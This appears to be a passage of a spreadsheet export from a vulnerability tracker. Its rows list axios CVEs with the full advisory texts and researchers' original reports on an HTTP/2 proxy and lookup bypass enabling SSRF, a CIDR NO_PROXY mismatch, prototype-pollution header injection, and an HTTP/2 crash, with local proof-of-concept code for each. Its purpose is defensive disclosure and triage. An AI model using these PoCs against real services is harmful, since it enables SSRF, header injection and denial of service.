        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101896</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M595" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js does not apply configured DNS lookup or proxy controls when a request uses `httpVersion: 2`. The HTTP/1 adapter path wraps and forwards `config.lookup`, builds normal request options, and applies proxy routing through `setProxy()`. The HTTP/2 path builds a session with `http2.connect()` using only `options.http2Options`, which drops the top-level `lookup`, `agent`, and proxy state.
Applications are affected when they allow a user to influence request destinations, enable axios HTTP/2, and rely on axios `lookup` or proxy routing to prevent SSRF or enforce outbound network policy.
## Impact
In affected server-side deployments, an attacker can cause axios to connect directly to destinations that the configured resolver or proxy would have rejected. Depending on reachable services, this can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems.
This is not an unconditional SSRF in every axios deployment. It requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by `lookup` or proxy policy.
## Affected Functionality
Affected:
- Node.js HTTP adapter with `httpVersion: 2`.
- `config.lookup` supplied as a DNS policy.
- Explicit `config.proxy` and environment-derived proxy settings for HTTPS HTTP/2 requests.
Not affected:
- Browser adapters.
- Node HTTP/1 requests, which pass `lookup` to the transport and apply proxy handling.
- Applications that validate destination hosts independently before calling axios.
## Technical Details
In `lib/adapters/http.js`, the adapter reads `lookup`, wraps it, stores it on the request `options`, and applies `setProxy()` before selecting a transport. For HTTP/2, `http2Transport.request()` builds an authority from `options.protocol`, `options.hostname`, and `options.port`, then calls:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` ultimately calls `http2.connect(authority, options)` with only the `http2Options` object. The configured DNS lookup and the proxy or tunneling agent installed on the top-level request options are not forwarded into that call.
Local verification on axios `1.18.1` showed `lookupCalls: 0` while an HTTP/2 request to a local h2 origin succeeded. A second local HTTPS h2 verification with an explicit rejecting HTTP proxy showed the origin received the request and the proxy observed no traffic.
## Proof of Concept of Attack
Local constrained demonstration:
1. Start an HTTP/2 server on loopback.
2. Call `axios.get("http://localhost:&lt;port&gt;/internal", { httpVersion: 2, lookup })` where `lookup` throws `EPOLICY`.
3. Observe that the request succeeds and the lookup counter remains `0`.
For proxy routing:
1. Start an HTTPS HTTP/2 origin and a local HTTP proxy that rejects every request and CONNECT.
2. Call axios with `httpVersion: 2`, `http2Options: { rejectUnauthorized: false }`, and explicit `proxy`.
3. Observe that the origin receives the request and the proxy receives nothing.
Expected safe behavior is that either the lookup policy blocks the request or the proxy observes and rejects the request.
## Workarounds
Use the HTTP/1 adapter path for requests that depend on axios `lookup` or proxy controls. Alternatively, enforce destination allow/deny policy before calling axios, outside the adapter transport path.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
  ### Summary
I found that Axios does not apply the configured `lookup` function or proxy when a request uses `httpVersion: 2`. The HTTP/1 adapter applies both controls, but the HTTP/2 path connects straight to the URL's hostname using `http2.connect()`.
This matters for server applications that accept a user-influenced URL and use a custom DNS lookup or mandatory outbound proxy to prevent SSRF. Switching the Axios instance to HTTP/2 silently removes those controls, allowing the request to reach an address the application intended to block.
I reproduced this on the current npm release, Axios 1.18.1.
### Details
The HTTP adapter reads and wraps the caller's `lookup` function, builds the normal request options, and calls `setProxy()`:
- `lib/adapters/http.js`, around lines 530-578: reads and wraps `lookup`
- `lib/adapters/http.js`, around lines 895-954: adds `lookup` to `options` and applies `setProxy()`
For HTTP/2, however, the adapter selects `http2Transport`. That transport creates an authority from the destination and only passes `options.http2Options` to the session pool:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` then calls:
```js
const session = http2.connect(authority, options);
```
At this point `options` is only the `http2Options` object. The top-level `lookup`, the proxy tunnelling agent created by `setProxy()`, and the selected `httpAgent`/`httpsAgent` are not forwarded. The request therefore uses the system resolver and opens a direct connection to the origin.
The same root cause affects both explicit proxy configuration and environment-derived proxy configuration. I kept the PoC local and used an explicit proxy so the result does not depend on shell environment variables.
### PoC
I attached [axios_http2_transport_controls_poc.mjs](https://drive.google.com/file/d/1lKXBOLDoysOFRmaRyV1tMVLx3P0Ah4gV/view?usp=sharing). The PoC is entirely local and sets up three pieces:
1. An HTTPS origin with HTTP/2 enabled. If reached, it records the request and returns `REACHED_BLOCKED_ORIGIN`.
2. An HTTP proxy that records traffic but rejects every normal request and every CONNECT request with `502 Bad Gateway`.
3. A custom Axios `lookup` callback that rejects every DNS lookup with an `EPOLICY` error.
The first request is an HTTP/1 control request. It uses the blocking `lookup` callback and has proxying disabled. Axios calls the callback, receives `EPOLICY`, and does not reach the origin. This confirms that the callback works and that the hostname is blocked through the normal adapter path.
The second request targets the same URL with `httpVersion: 2`. It is given both security controls: the same blocking `lookup` callback and the rejecting proxy. If Axios honors either one, this request cannot reach the origin. It should fail with `EPOLICY`, or it should reach the proxy and receive its `502` response.
Instead, the request returns HTTP 200 with `REACHED_BLOCKED_ORIGIN`. The lookup counter does not increase, and the proxy records no request or CONNECT attempt. The origin is the only server that records traffic. This shows that the HTTP/2 path skipped both controls and connected directly using the system resolver.
To reproduce, run the attachment from the root of an Axios checkout:
Run it from the root of an Axios checkout:
```bash
git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs
```
Relevant output from my run:
```json
{
  "axiosVersion": "1.18.1",
  "configuredControls": {
    "lookup": "reject every DNS lookup with EPOLICY",
    "proxy": "http://127.0.0.1:&lt;port&gt; (reject every request)"
  },
  "http1Control": "EPOLICY: blocked by application DNS policy",
  "http2Result": {
    "status": 200,
    "data": "REACHED_BLOCKED_ORIGIN"
  },
  "lookupCalls": 1,
  "proxyObservedTraffic": false,
  "events": [
    {
      "server": "origin",
      "protocol": "h2",
      "path": "/internal"
    }
  ]
}
```
The important parts of the output are:
- `http1Control` contains `EPOLICY`, proving the DNS policy blocks the destination under HTTP/1.
- `lookupCalls` is still `1` after both requests, proving HTTP/2 never called the configured resolver.
- `proxyObservedTraffic` is `false`, proving HTTP/2 did not use the configured proxy.
- `http2Result.status` is `200`, and the sole event belongs to the origin, proving Axios connected directly to the blocked destination.
### Impact
The vulnerable configuration is a Node.js application that:
- enables Axios HTTP/2 using `httpVersion: 2`;
- lets an application user influence the request destination; and
- relies on Axios's `lookup` option or proxy routing to enforce a destination or egress policy.
In that setup, an unauthenticated application user may be able to make the server connect directly to loopback, private-network, or link-local services that the lookup policy or proxy would have rejected. Depending on the reachable service, this can expose cloud credentials or internal data, modify internal services, or affect availability.
HTTP/2 support is marked experimental, but neither the HTTP/2 documentation nor the proxy documentation says that `lookup` and proxy controls are ignored. The proxy documentation states that HTTPS requests are sent through a CONNECT tunnel. More importantly, Axios's threat model tells callers that destination validation is their responsibility; this behavior silently bypasses such caller-supplied validation.
I did not test against any third-party or production service. The PoC only uses listeners on my own machine.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101899</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M596" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios supports proxy environment variables and evaluates `NO_PROXY` exclusions in the Node.js adapter. CIDR-form `NO_PROXY` entries such as `127.0.0.0/8`, `10.0.0.0/8`, or `169.254.169.254/32` are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.
This affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.
## Impact
If the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.
This is a proxy exclusion bypass, not arbitrary proxy injection by itself.
## Affected Functionality
Affected:
- Node.js adapter proxy environment handling.
- `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, or lowercase equivalents.
- CIDR entries in `NO_PROXY`.
Not affected:
- Exact host or exact IP `NO_PROXY` entries where axios matching succeeds.
- Requests configured with `proxy: false`.
- Browser adapters.
## Technical Details
`lib/helpers/shouldBypassProxy.js` parses each `NO_PROXY` entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.
Local verification on axios `1.18.1`:
```js
process.env.NO_PROXY = '127.0.0.0/8';
shouldBypassProxy('http://127.0.0.1:1234/'); // false
```
The expected result for CIDR-aware bypass policy is `true`.
## Proof of Concept of Attack
Constrained local demonstration:
1. Set `HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;`.
2. Set `NO_PROXY=127.0.0.0/8`.
3. Request `http://127.0.0.1:&lt;internal-port&gt;/metadata`.
4. Observe that axios sends the request through the proxy instead of directly to the internal listener.
## Workarounds
Use exact host or IP entries in `NO_PROXY` for sensitive destinations until CIDR matching is fixed, for example `127.0.0.1,localhost,169.254.169.254`. For individual requests that must not use a proxy, set `proxy: false`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy.
In the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`.
This can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying.
## Details
Axios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios’s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack
The issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:
```text
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;
Target URL=http://127.0.0.1:&lt;internal-port&gt;/metadata
```
Since `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`.
This appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios's Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks.
The issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied.
This is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:
```text
127.0.0.0/8
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.169.254/32
```
If operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation.
## PoC
```js
import http from 'http';
import axios from 'axios';
function listen(server, host) {
  return new Promise((resolve, reject) =&gt; {
    server.once('error', reject);
    server.listen(0, host, () =&gt; resolve(server.address().port));
  });
}
function close(server) {
  return new Promise((resolve) =&gt; server.close(resolve));
}
let proxyHits = 0;
let internalHits = 0;
const internal = http.createServer((req, res) =&gt; {
  internalHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`internal service saw ${req.url}`);
});
const proxy = http.createServer((req, res) =&gt; {
  proxyHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`proxy saw request for ${req.url}`);
});
const internalHost = process.env.POC_INTERNAL_HOST || '127.0.0.2';
const proxyHost = process.env.POC_PROXY_HOST || '127.0.0.1';
let internalPort;
let proxyPort;
try {
  internalPort = await listen(internal, internalHost);
  proxyPort = await listen(proxy, proxyHost);
} catch (error) {
  console.error('Failed to bind local PoC servers.');
  console.error('On some systems 127.0.0.2 is unavailable; try:');
  console.error('  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs');
  console.error('');
  throw error;
}
const targetUrl = `http://${internalHost}:${internalPort}/metadata`;
const proxyUrl = `http://${proxyHost}:${proxyPort}`;
const noProxy = process.env.POC_NO_PROXY || '127.0.0.0/8';
process.env.http_proxy = proxyUrl;
process.env.HTTP_PROXY = proxyUrl;
process.env.no_proxy = noProxy;
process.env.NO_PROXY = noProxy;
console.log('Axios NO_PROXY CIDR full axios network PoC');
console.log(`axios VERSION=${axios.VERSION || 'unknown'}`);
console.log(`NO_PROXY=${process.env.no_proxy}`);
console.log(`HTTP_PROXY=${process.env.http_proxy}`);
console.log(`Target URL=${targetUrl}`);
console.log('');
try {
  const response = await axios.get(targetUrl, {
    timeout: 2000,
  });
  console.log(`Response=${response.data}`);
  console.log(`Proxy hits=${proxyHits}`);
  console.log(`Internal direct hits=${internalHits}`);
  console.log('');
  if (proxyHits &gt; 0 &amp;&amp; internalHits === 0) {
    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);
  } else if (proxyHits === 0 &amp;&amp; internalHits &gt; 0) {
    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);
  } else {
    console.log('POC RESULT: mixed/ambiguous routing; inspect counts above.');
  }
} finally {
  delete process.env.http_proxy;
  delete process.env.HTTP_PROXY;
  delete process.env.no_proxy;
  delete process.env.NO_PROXY;
  await close(proxy);
  await close(internal);
}
```
Run the failing CIDR case:
```bash
POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Observed:
```text
Axios NO_PROXY CIDR full axios network PoC
axios VERSION=1.17.0
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:34315
Target URL=http://127.0.0.1:43993/metadata
Response=proxy saw request for http://127.0.0.1:43993/metadata
Proxy hits=1
Internal direct hits=0
POC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.
```
## Control
Axios does honor exact IP `NO_PROXY` entries:
```bash
POC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Expected:
```text
NO_PROXY=127.0.0.1
Response=internal service saw /metadata
Proxy hits=0
Internal direct hits=1
POC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.
```
This shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`.
## Impact
This is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`.
The impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges.
Potentially impacted environments include:
- CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`.
- Containers inheriting proxy variables from the host or orchestrator.
- Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges.
- Enterprise networks using HTTP proxies with internal network exclusions.
- Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure.
If a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior.
This should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101899</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M597" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios contains a guard in the Node HTTP adapter to avoid using an inherited `Object.prototype.getHeaders` as a FormData header source. The fetch adapter calls the shared `resolveConfig()` helper before dispatch, and that helper lacks the same guard. If another vulnerability pollutes `Object.prototype` with FormData-like properties and `getHeaders()`, the fetch adapter can merge attacker-controlled headers into the outbound request.
Axios does not create the prototype pollution source. This is a read-side gadget in the fetch adapter configuration path.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into fetch-adapter requests. Depending on the target service, this may affect authorization, metadata-service access, cache behavior, conditional request handling, or other application-specific header logic.
Plain objects are blocked by current FormData detection. The confirmed path uses arrays or non-plain class instances whose prototype chain can resolve polluted FormData-like properties.
## Affected Functionality
Affected:
- Fetch adapter requests.
- `resolveConfig()` handling of `utils.isFormData(data)`.
- Request bodies that can be spoofed as FormData through inherited `Symbol.toStringTag`, `append`, and `getHeaders`.
Not affected:
- Node HTTP adapter's later FormData header path, which checks `data.getHeaders !== Object.prototype.getHeaders`.
- Plain object request bodies rejected by current `isFormData()` plain-object guard.
- Processes without prototype pollution.
## Technical Details
`lib/helpers/resolveConfig.js` currently contains:
```js
if (utils.isFormData(data)) {
  if (platform.hasStandardBrowserEnv || platform.hasStandardBrowserWebWorkerEnv || utils.isReactNative(data)) {
    headers.setContentType(undefined);
  } else if (utils.isFunction(data.getHeaders)) {
    setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
  }
}
```
Unlike `lib/adapters/http.js`, this code does not reject `Object.prototype.getHeaders`. Local verification on axios `1.18.1` polluted `Object.prototype[Symbol.toStringTag]`, `append`, and `getHeaders`, then sent an array body with `adapter: 'fetch'`. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = function () {};
Object.prototype.getHeaders = () =&gt; ({ 'X-Poisoned': 'yes' });
await axios.post(url, ['a', 'b'], { adapter: 'fetch' });
```
Expected safe behavior is that inherited `Object.prototype.getHeaders` is ignored. Current affected behavior merges the returned header.
## Workarounds
Use the Node HTTP adapter for server-side requests that may run in a polluted process. Avoid passing array or class-instance bodies through the fetch adapter when prototype pollution is suspected.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
The Node HTTP adapter contains a guard that prevents `Object.prototype.getHeaders` from being used as a FormData header source. The shared `resolveConfig()` helper does not have the same guard. The fetch adapter calls `resolveConfig()`, so it can still merge headers returned by inherited `data.getHeaders()`.
This is a patch mismatch for the FormData prototype-pollution header-injection class.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- Application uses `adapter: 'fetch'`.
- A separate prototype-pollution primitive can write:
  - `Object.prototype[Symbol.toStringTag] = 'FormData'`
  - `Object.prototype.append = function () {}`
  - `Object.prototype.getHeaders = function () { ... }`
- The request body is an array or custom class instance. Plain objects are blocked by the current `isFormData()` plain-object guard.
## Root Cause
`lib/adapters/http.js` contains:
```js
data.getHeaders !== Object.prototype.getHeaders
```
But `lib/helpers/resolveConfig.js` only checks:
```js
} else if (utils.isFunction(data.getHeaders)) {
  setFormDataHeaders(headers, data.getHeaders(), own('formDataHeaderPolicy'));
}
```
The fetch adapter calls `resolveConfig(config)` before dispatching the request.
## Impact
An attacker can inject arbitrary headers into fetch-adapter requests. This may be used to influence internal APIs, metadata services, cache behavior, or application-specific authorization checks.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer((req, res) =&gt; {
    let body = '';
    req.on('data', (chunk) =&gt; (body += chunk));
    req.on('end', () =&gt; handler(req, res, body));
  });
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const tag = Symbol.toStringTag;
const server = await start((req, res, body) =&gt; {
  hits.push({ headers: req.headers, body });
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype[tag] = 'FormData';
  Object.prototype.append = function () {};
  Object.prototype.getHeaders = () =&gt; {
    const headers = Object.create(null);
    headers['X-Poisoned'] = 'yes';
    return headers;
  };
  await axios.post(`http://127.0.0.1:${server.address().port}/fetch-formdata`, ['a', 'b'], {
    adapter: 'fetch',
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype[tag];
  delete Object.prototype.append;
  delete Object.prototype.getHeaders;
  await stop(server);
}
```
Observed wire request:
```json
{
  "headers": {
    "x-poisoned": "yes",
    "content-type": "text/plain;charset=UTF-8",
    "content-length": "3"
  },
  "body": "a,b"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
- https://osv.dev/vulnerability/GHSA-6chq-wfr3-2hj9
- Related patch area: `lib/adapters/http.js`, `lib/helpers/resolveConfig.js`
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M598" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.
This affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.
## Impact
The impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.
This does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.
## Affected Functionality
Affected path:
- Node.js HTTP adapter
- httpVersion: 2
- HTTP/2 session creation/reuse through Http2Sessions
- Network/session failures emitted as ClientHttp2Session error events
Caller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.
## Technical Details
Http2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.
When the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.
## Proof of Concept of Attack
```js
import axios from './index.js';
await axios.get('http://127.0.0.1:1/', {
  httpVersion: 2,
  timeout: 1000
});
```
Expected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.
## Workarounds
Disable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hi, i'm RelunSec a security researcher working with **InsiteTech.jp**
i want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server
```js
const http = require('http');
// Import the local axios version to ensure the patch is active
const axios = require('../../lib/axios.js').default; 
const url = require('url');
// A public HTTP/2 server to make internal requests to.
// This simulates an external service your application might interact with over HTTP/2.
const TARGET_URL = 'https://nghttp2.org/'; 
const PORT = 3000;
const server = http.createServer(async (req, res) =&gt; {
  const parsedUrl = url.parse(req.url, true);
  const http2optionId = parsedUrl.query.http2optionId;
  if (!http2optionId) {
  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);
  res.writeHead(400, { 'Content-Type': 'text/plain' });
  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\n');
  return; 
}
  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);
  // Create an Axios instance configured for HTTP/2
  // The 'id' in http2Options makes each session configuration unique.
  const axiosInstance = axios.create({
    baseURL: TARGET_URL,
    httpVersion: 2,
    http2Options: {
      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert
      id: http2optionId, // This is the attacker-controlled unique part
    },
